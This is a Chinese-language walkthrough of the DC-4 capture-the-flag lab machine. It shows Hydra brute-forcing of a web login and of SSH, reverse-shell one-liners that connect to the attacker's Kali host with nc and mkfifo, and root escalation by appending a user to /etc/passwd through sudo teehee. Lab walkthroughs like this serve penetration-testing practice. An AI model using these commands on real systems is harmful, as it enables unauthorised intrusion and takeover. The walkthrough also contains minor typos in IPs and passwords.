DC-4靶機
實驗環境
- 靶機:DC-4靶機(192.168.126.138)
- 攻擊機:kali Linux(192.168.126.129)
資訊收集
ip:192.168.126.138
開放的埠:
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp開放 http nginx 1.15.10
運行:Linux 3.X | 4.X
作業系統CPE:CPE:/o:linux:linux\u 內核:3 CPE:/o:linux:linux\u內核:4
作業系統詳細資訊:Linux 3.2-4.9
滲透測驗
1.漏洞發現與getshell
因為開啟了22埠,這里我們嘗試一下直接連接
ssh root@192.168.126.138
直接試不出密碼,這里嘗試進行弱口令爆破
使用Hydra(九頭蛇)進行爆破,爆破字典為rockyou.txt 路徑在/usr/share/wordlists/
hydra -l admin -P /usr/share/wordlists/rockyou.txt x.x.x.161 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
這里看到賬號密碼被爆破出來
賬號:admin
密碼:happy
直接進行登錄
找到命令執行的地方:command
點擊進入,發現可以直接命令執行,考慮bp抓包,但這里發現前端可以直接命令執行
直接反彈shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.126.129 4444 > /tmp/f;
nc -e /bin/bash 192.168.126.129 1234
可以嘗試前端直接改,也可以使用bp抓包
*記得得先監聽再操作
nc -lnvp 1234
2.提權
使用python獲取互動
python -c 'import pty;pty.spawn("/bin/bash")'
搜索檔案
進入根目錄->home
發現三個用戶:charles,jim,sam
進行一一查看,發現除了jim用戶,其他兩個都是為空
在jim用戶檔案內找到一個密碼字典:old-passwords.bak
這里可以考慮爆破ssh密碼,將改密碼復制拉取到kali
hydra -L ./dc-4.user -P ./dc-4.pass -vV -t 10 -o dc-4 192.168.126.138 ssh -s 22
可以看到已經爆破出了jim的密碼為jibril04
直接進行ssh登錄
查看jim可以執行sudo的命令
沒有權限,只能進行檔案搜索,尋找其他的用戶密碼
發現了charles用戶交給 jim用戶保管的密碼
charles:^xHhA&hvim0y
嘗試登錄charles用戶
查看charles用戶可執行的sudo命令
可以執行teehee命令
如何使用teehee命令進行提權呢?
參考各位師傅的方法:
使用該命令給**/etc/passwd**里面添加一個用戶
perl -le 'print crypt("123456", "aa")'
得到我們要添加的用戶的密碼:aaAN1ZUwjW7to
echo "good:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/passwd
切換到good用戶:
su - good
密碼為前面的1232456
提權成功
總結
滲透步驟
1.ssh爆破失敗,通過web爆破進入后臺;
2.后臺發現命令執行,執行反彈shell,getshell成功;
3.進去進行提權,找到用戶密碼;
4.拿到jim用戶無法提權,通過郵件目錄/var/mail找到charles用戶密碼;
5.charles用戶下執行sudo -l 命令,得到了teehee命令,使用該命令提權成功;
自我總結
1.對linux檔案目錄不熟悉,找到有效資訊花了較多時間;
2.對于各種提權操作不熟悉,多是看大佬的博客進行操作;
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/352113.html
標籤:其他